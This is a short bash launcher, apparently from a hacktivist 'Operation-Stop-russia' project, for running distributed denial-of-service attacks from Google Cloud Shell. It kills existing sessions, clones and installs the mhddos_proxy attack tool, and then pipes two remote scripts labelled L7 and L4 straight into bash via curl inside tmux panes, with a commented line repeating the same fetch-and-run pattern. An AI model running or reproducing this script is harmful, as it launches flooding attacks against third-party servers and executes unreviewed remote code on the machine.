#!/bin/bash
#curl -l https://raw.githubusercontent.com/Operation-Stop-russia/Gcloudshell_ddos/main/Start_dual | bash
#sudo apt-get update -y
# apt-get upgrade -y
#sudo apt-get install -y tmux wget python3 python3-pip gcc python3-dev rustc
# apt-get upgrade -y tmux wget python3 python3-pip gcc python3-dev rustc
#pip install --upgrade pip

tmux kill-session -t dualshell; pkill node
rm -rf dualshell
mkdir dualshell
cd dualshell

git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
python3 -m pip install -r requirements.txt

tmux new-session -s dualshell 'curl -s https://raw.githubusercontent.com/Operation-Stop-russia/Gcloudshell_ddos/main/L7 | bash'
sleep 10
tmux split-window -h -p 50 'curl -s https://raw.githubusercontent.com/Operation-Stop-russia/Gcloudshell_ddos/main/L4 | bash'
